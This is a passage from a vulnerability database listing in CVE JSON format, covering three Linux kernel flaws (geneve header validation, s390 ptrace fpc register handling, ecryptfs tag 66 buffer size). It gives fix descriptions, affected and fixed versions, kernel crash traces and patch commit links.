]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-29T19:56:09.359Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.047Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/43be590456e1f3566054ce78ae2dbb68cbe1a536"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d3adf11d7993518a39bd02b383cfe657ccc0023c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/10204df9beda4978bd1d0c2db0d8375bfb03b915"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c1ae6de74e3d2d6333d29a2d3e13e6094596c79"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a1b65d1e55d53b397cb27014208be1e04172670"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/190d9efa5773f26d6f334b1b8be282c4fa13fd5e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/357163fff3a6e48fe74745425a32071ec9caf852"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d8a6213d70accb403b82924a1c229e733433a5ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/geneve.c",
"include/net/ip_tunnels.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "43be590456e1f3566054ce78ae2dbb68cbe1a536",
"status": "affected",
"version": "35385daa8db320d2d9664930c28e732578b0d7de",
"versionType": "git"
},
{
"lessThan": "d3adf11d7993518a39bd02b383cfe657ccc0023c",
"status": "affected",
"version": "6f92124d74419797fadfbcd5b7a72c384a6413ad",
"versionType": "git"
},
{
"lessThan": "10204df9beda4978bd1d0c2db0d8375bfb03b915",
"status": "affected",
"version": "71ad9260c001b217d704cda88ecea251b2d367da",
"versionType": "git"
},
{
"lessThan": "3c1ae6de74e3d2d6333d29a2d3e13e6094596c79",
"status": "affected",
"version": "d13f048dd40e8577260cd43faea8ec9b77520197",
"versionType": "git"
},
{
"lessThan": "4a1b65d1e55d53b397cb27014208be1e04172670",
"status": "affected",
"version": "d13f048dd40e8577260cd43faea8ec9b77520197",
"versionType": "git"
},
{
"lessThan": "190d9efa5773f26d6f334b1b8be282c4fa13fd5e",
"status": "affected",
"version": "d13f048dd40e8577260cd43faea8ec9b77520197",
"versionType": "git"
},
{
"lessThan": "357163fff3a6e48fe74745425a32071ec9caf852",
"status": "affected",
"version": "d13f048dd40e8577260cd43faea8ec9b77520197",
"versionType": "git"
},
{
"lessThan": "d8a6213d70accb403b82924a1c229e733433a5ef",
"status": "affected",
"version": "d13f048dd40e8577260cd43faea8ec9b77520197",
"versionType": "git"
},
{
"status": "affected",
"version": "9a51e36ebf433adf59c051bec33f5aa54640bb4d",
"versionType": "git"
},
{
"status": "affected",
"version": "21815f28af8081b258552c111774ff320cf38d38",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/geneve.c",
"include/net/ip_tunnels.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.156",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.19.191",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.4.119",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.10.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.156",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.11.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.12.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngeneve: fix header validation in geneve[6]_xmit_skb\n\nsyzbot is able to trigger an uninit-value in geneve_xmit() [1]\n\nProblem : While most ip tunnel helpers (like ip_tunnel_get_dsfield())\nuses skb_protocol(skb, true), pskb_inet_may_pull() is only using\nskb-\u003eprotocol.\n\nIf anything else than ETH_P_IPV6 or ETH_P_IP is found in skb-\u003eprotocol,\npskb_inet_may_pull() does nothing at all.\n\nIf a vlan tag was provided by the caller (af_packet in the syzbot case),\nthe network header might not point to the correct location, and skb\nlinear part could be smaller than expected.\n\nAdd skb_vlan_inet_prepare() to perform a complete mac validation.\n\nUse this in geneve for the moment, I suspect we need to adopt this\nmore broadly.\n\nv4 - Jakub reported v3 broke l2_tos_ttl_inherit.sh selftest\n - Only call __vlan_get_protocol() for vlan types.\n\nv2,v3 - Addressed Sabrina comments on v1 and v2\n\n[1]\n\nBUG: KMSAN: uninit-value in geneve_xmit_skb drivers/net/geneve.c:910 [inline]\n BUG: KMSAN: uninit-value in geneve_xmit+0x302d/0x5420 drivers/net/geneve.c:1030\n geneve_xmit_skb drivers/net/geneve.c:910 [inline]\n geneve_xmit+0x302d/0x5420 drivers/net/geneve.c:1030\n __netdev_start_xmit include/linux/netdevice.h:4903 [inline]\n netdev_start_xmit include/linux/netdevice.h:4917 [inline]\n xmit_one net/core/dev.c:3531 [inline]\n dev_hard_start_xmit+0x247/0xa20 net/core/dev.c:3547\n __dev_queue_xmit+0x348d/0x52c0 net/core/dev.c:4335\n dev_queue_xmit include/linux/netdevice.h:3091 [inline]\n packet_xmit+0x9c/0x6c0 net/packet/af_packet.c:276\n packet_snd net/packet/af_packet.c:3081 [inline]\n packet_sendmsg+0x8bb0/0x9ef0 net/packet/af_packet.c:3113\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x30f/0x380 net/socket.c:745\n __sys_sendto+0x685/0x830 net/socket.c:2191\n __do_sys_sendto net/socket.c:2203 [inline]\n __se_sys_sendto net/socket.c:2199 [inline]\n __x64_sys_sendto+0x125/0x1d0 net/socket.c:2199\n do_syscall_64+0xd5/0x1f0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nUninit was created at:\n slab_post_alloc_hook mm/slub.c:3804 [inline]\n slab_alloc_node mm/slub.c:3845 [inline]\n kmem_cache_alloc_node+0x613/0xc50 mm/slub.c:3888\n kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:577\n __alloc_skb+0x35b/0x7a0 net/core/skbuff.c:668\n alloc_skb include/linux/skbuff.h:1318 [inline]\n alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6504\n sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2795\n packet_alloc_skb net/packet/af_packet.c:2930 [inline]\n packet_snd net/packet/af_packet.c:3024 [inline]\n packet_sendmsg+0x722d/0x9ef0 net/packet/af_packet.c:3113\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x30f/0x380 net/socket.c:745\n __sys_sendto+0x685/0x830 net/socket.c:2191\n __do_sys_sendto net/socket.c:2203 [inline]\n __se_sys_sendto net/socket.c:2199 [inline]\n __x64_sys_sendto+0x125/0x1d0 net/socket.c:2199\n do_syscall_64+0xd5/0x1f0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nCPU: 0 PID: 5033 Comm: syz-executor346 Not tainted 6.9.0-rc1-syzkaller-00005-g928a87efa423 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:09.345Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/43be590456e1f3566054ce78ae2dbb68cbe1a536"
},
{
"url": "https://git.kernel.org/stable/c/d3adf11d7993518a39bd02b383cfe657ccc0023c"
},
{
"url": "https://git.kernel.org/stable/c/10204df9beda4978bd1d0c2db0d8375bfb03b915"
},
{
"url": "https://git.kernel.org/stable/c/3c1ae6de74e3d2d6333d29a2d3e13e6094596c79"
},
{
"url": "https://git.kernel.org/stable/c/4a1b65d1e55d53b397cb27014208be1e04172670"
},
{
"url": "https://git.kernel.org/stable/c/190d9efa5773f26d6f334b1b8be282c4fa13fd5e"
},
{
"url": "https://git.kernel.org/stable/c/357163fff3a6e48fe74745425a32071ec9caf852"
},
{
"url": "https://git.kernel.org/stable/c/d8a6213d70accb403b82924a1c229e733433a5ef"
}
],
"title": "geneve: fix header validation in geneve[6]_xmit_skb",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35973",
"datePublished": "2024-05-20T09:42:00.475Z",
"dateReserved": "2024-05-17T13:50:33.142Z",
"dateUpdated": "2025-05-04T12:56:09.345Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52598 (GCVE-0-2023-52598)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
s390/ptrace: handle setting of fpc register correctly
If the content of the floating point control (fpc) register of a traced
process is modified with the ptrace interface the new value is tested for
validity by temporarily loading it into the fpc register.
This may lead to corruption of the fpc register of the tracing process:
if an interrupt happens while the value is temporarily loaded into the
fpc register, and within interrupt context floating point or vector
registers are used, the current fp/vx registers are saved with
save_fpu_regs() assuming they belong to user space and will be loaded into
fp/vx registers when returning to user space.
test_fp_ctl() restores the original user space fpc register value, however
it will be discarded, when returning to user space.
In result the tracer will incorrectly continue to run with the value that
was supposed to be used for the traced process.
Fix this by saving fpu register contents with save_fpu_regs() before using
test_fp_ctl().
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52598",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-11T15:45:25.541876Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:58.271Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.151Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ccf904aac0292e1f6b1a1be6c407c414f7cf713"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d0822f2cc9b153bf2df49a84599195a2e0d21a8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/856caf2730ea18cb39e95833719c02a02447dc0a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/28a1f492cb527f64593457a0a0f0d809b3f36c25"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a4d6481fbdd661f9e40e95febb95e3dee82bad3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/02c6bbfb08bad78dd014e24c7b893723c15ec7a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bdce67df7f12fb0409fbc604ce7c4254703f56d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8b13601d19c541158a6e18b278c00ba69ae37829"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/s390/kernel/ptrace.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6ccf904aac0292e1f6b1a1be6c407c414f7cf713",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6d0822f2cc9b153bf2df49a84599195a2e0d21a8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "856caf2730ea18cb39e95833719c02a02447dc0a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "28a1f492cb527f64593457a0a0f0d809b3f36c25",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7a4d6481fbdd661f9e40e95febb95e3dee82bad3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "02c6bbfb08bad78dd014e24c7b893723c15ec7a1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bdce67df7f12fb0409fbc604ce7c4254703f56d4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8b13601d19c541158a6e18b278c00ba69ae37829",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/s390/kernel/ptrace.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/ptrace: handle setting of fpc register correctly\n\nIf the content of the floating point control (fpc) register of a traced\nprocess is modified with the ptrace interface the new value is tested for\nvalidity by temporarily loading it into the fpc register.\n\nThis may lead to corruption of the fpc register of the tracing process:\nif an interrupt happens while the value is temporarily loaded into the\nfpc register, and within interrupt context floating point or vector\nregisters are used, the current fp/vx registers are saved with\nsave_fpu_regs() assuming they belong to user space and will be loaded into\nfp/vx registers when returning to user space.\n\ntest_fp_ctl() restores the original user space fpc register value, however\nit will be discarded, when returning to user space.\n\nIn result the tracer will incorrectly continue to run with the value that\nwas supposed to be used for the traced process.\n\nFix this by saving fpu register contents with save_fpu_regs() before using\ntest_fp_ctl()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:30.133Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6ccf904aac0292e1f6b1a1be6c407c414f7cf713"
},
{
"url": "https://git.kernel.org/stable/c/6d0822f2cc9b153bf2df49a84599195a2e0d21a8"
},
{
"url": "https://git.kernel.org/stable/c/856caf2730ea18cb39e95833719c02a02447dc0a"
},
{
"url": "https://git.kernel.org/stable/c/28a1f492cb527f64593457a0a0f0d809b3f36c25"
},
{
"url": "https://git.kernel.org/stable/c/7a4d6481fbdd661f9e40e95febb95e3dee82bad3"
},
{
"url": "https://git.kernel.org/stable/c/02c6bbfb08bad78dd014e24c7b893723c15ec7a1"
},
{
"url": "https://git.kernel.org/stable/c/bdce67df7f12fb0409fbc604ce7c4254703f56d4"
},
{
"url": "https://git.kernel.org/stable/c/8b13601d19c541158a6e18b278c00ba69ae37829"
}
],
"title": "s390/ptrace: handle setting of fpc register correctly",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52598",
"datePublished": "2024-03-06T06:45:27.127Z",
"dateReserved": "2024-03-02T21:55:42.572Z",
"dateUpdated": "2025-05-04T07:39:30.133Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38578 (GCVE-0-2024-38578)
Vulnerability from cvelistv5
Published
2024-06-19 13:37
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: Fix buffer size for tag 66 packet
The 'TAG 66 Packet Format' description is missing the cipher code and
checksum fields that are packed into the message packet. As a result,
the buffer allocated for the packet is 3 bytes too small and
write_tag_66_packet() will write up to 3 bytes past the end of the
buffer.
Fix this by increasing the size of the allocation so the whole packet
will always fit in the buffer.
This fixes the below kasan slab-out-of-bounds bug:
BUG: KASAN: slab-out-of-bounds in ecryptfs_generate_key_packet_set+0x7d6/0xde0
Write of size 1 at addr ffff88800afbb2a5 by task touch/181
CPU: 0 PID: 181 Comm: touch Not tainted 6.6.13-gnu #1 4c9534092be820851bb687b82d1f92a426598dc6
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2/GNU Guix 04/01/2014
Call Trace:
<TASK>
dump_stack_lvl+0x4c/0x70
print_report+0xc5/0x610
? ecryptfs_generate_key_packet_set+0x7d6/0xde0
? kasan_complete_mode_report_info+0x44/0x210
? ecryptfs_generate_key_packet_set+0x7d6/0xde0
kasan_report+0xc2/0x110
? ecryptfs_generate_key_packet_set+0x7d6/0xde0
__asan_store1+0x62/0x80
ecryptfs_generate_key_packet_set+0x7d6/0xde0
? __pfx_ecryptfs_generate_key_packet_set+0x10/0x10
? __alloc_pages+0x2e2/0x540
? __pfx_ovl_open+0x10/0x10 [overlay 30837f11141636a8e1793533a02e6e2e885dad1d]
? dentry_open+0x8f/0xd0
ecryptfs_write_metadata+0x30a/0x550
? __pfx_ecryptfs_write_metadata+0x10/0x10
? ecryptfs_get_lower_file+0x6b/0x190
ecryptfs_initialize_file+0x77/0x150
ecryptfs_create+0x1c2/0x2f0
path_openat+0x17cf/0x1ba0
? __pfx_path_openat+0x10/0x10
do_filp_open+0x15e/0x290
? __pfx_do_filp_open+0x10/0x10
? __kasan_check_write+0x18/0x30
? _raw_spin_lock+0x86/0xf0
? __pfx__raw_spin_lock+0x10/0x10
? __kasan_check_write+0x18/0x30
? alloc_fd+0xf4/0x330
do_sys_openat2+0x122/0x160
? __pfx_do_sys_openat2+0x10/0x10
__x64_sys_openat+0xef/0x170
? __pfx___x64_sys_openat+0x10/0x10
do_syscall_64+0x60/0xd0
entry_SYSCALL_64_after_hwframe+0x6e/0xd8
RIP: 0033:0x7f00a703fd67
Code: 25 00 00 41 00 3d 00 00 41 00 74 37 64 8b 04 25 18 00 00 00 85 c0 75 5b 44 89 e2 48 89 ee bf 9c ff ff ff b8 01 01 00 00 0f 05 <48> 3d 00 f0 ff ff 0f 87 85 00 00 00 48 83 c4 68 5d 41 5c c3 0f 1f
RSP: 002b:00007ffc088e30b0 EFLAGS: 00000246 ORIG_RAX: 0000000000000101
RAX: ffffffffffffffda RBX: 00007ffc088e3368 RCX: 00007f00a703fd67
RDX: 0000000000000941 RSI: 00007ffc088e48d7 RDI: 00000000ffffff9c
RBP: 00007ffc088e48d7 R08: 0000000000000001 R09: 0000000000000000
R10: 00000000000001b6 R11: 0000000000000246 R12: 0000000000000941
R13: 0000000000000000 R14: 00007ffc088e48d7 R15: 00007f00a7180040
</TASK>
Allocated by task 181:
kasan_save_stack+0x2f/0x60
kasan_set_track+0x29/0x40
kasan_save_alloc_info+0x25/0x40
__kasan_kmalloc+0xc5/0xd0
__kmalloc+0x66/0x160
ecryptfs_generate_key_packet_set+0x6d2/0xde0
ecryptfs_write_metadata+0x30a/0x550
ecryptfs_initialize_file+0x77/0x150
ecryptfs_create+0x1c2/0x2f0
path_openat+0x17cf/0x1ba0
do_filp_open+0x15e/0x290
do_sys_openat2+0x122/0x160
__x64_sys_openat+0xef/0x170
do_syscall_64+0x60/0xd0
entry_SYSCALL_64_after_hwframe+0x6e/0xd8
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: dddfa461fc8951f9b5f951c13565b6cac678635a Version: dddfa461fc8951f9b5f951c13565b6cac678635a Version: dddfa461fc8951f9b5f951c13565b6cac678635a Version: dddfa461fc8951f9b5f951c13565b6cac678635a Version: dddfa461fc8951f9b5f951c13565b6cac678635a Version: dddfa461fc8951f9b5f951c13565b6cac678635a Version: dddfa461fc8951f9b5f951c13565b6cac678635a Version: dddfa461fc8951f9b5f951c13565b6cac678635a Version: dddfa461fc8951f9b5f951c13565b6cac678635a |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:32.595Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1c125b9287e58f364d82174efb167414b92b11f1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/235b85981051cd68fc215fd32a81c6f116bfc4df"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/edbfc42ab080e78c6907d40a42c9d10b69e445c1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/12db25a54ce6bb22b0af28010fff53ef9cb3fe93"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d0f8ba042af16519f1ef7dd10463a33b21b677c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2ed750b7ae1b5dc72896d7dd114c419afd3d1910"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a20f09452e2f58f761d11ad7b96b5c894c91030e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6008487f1eeb8693f8d2a36a89c87d9122ddf74"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/85a6a1aff08ec9f5b929d345d066e2830e8818e5"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38578",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:14:06.312936Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:55.678Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ecryptfs/keystore.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1c125b9287e58f364d82174efb167414b92b11f1",
"status": "affected",
"version": "dddfa461fc8951f9b5f951c13565b6cac678635a",
"versionType": "git"
},
{
"lessThan": "235b85981051cd68fc215fd32a81c6f116bfc4df",
"status": "affected",
"version": "dddfa461fc8951f9b5f951c13565b6cac678635a",
"versionType": "git"
},
{
"lessThan": "edbfc42ab080e78c6907d40a42c9d10b69e445c1",
"status": "affected",
"version": "dddfa461fc8951f9b5f951c13565b6cac678635a",
"versionType": "git"
},
{
"lessThan": "12db25a54ce6bb22b0af28010fff53ef9cb3fe93",
"status": "affected",
"version": "dddfa461fc8951f9b5f951c13565b6cac678635a",
"versionType": "git"
},
{
"lessThan": "0d0f8ba042af16519f1ef7dd10463a33b21b677c",
"status": "affected",
"version": "dddfa461fc8951f9b5f951c13565b6cac678635a",
"versionType": "git"
},
{
"lessThan": "2ed750b7ae1b5dc72896d7dd114c419afd3d1910",
"status": "affected",
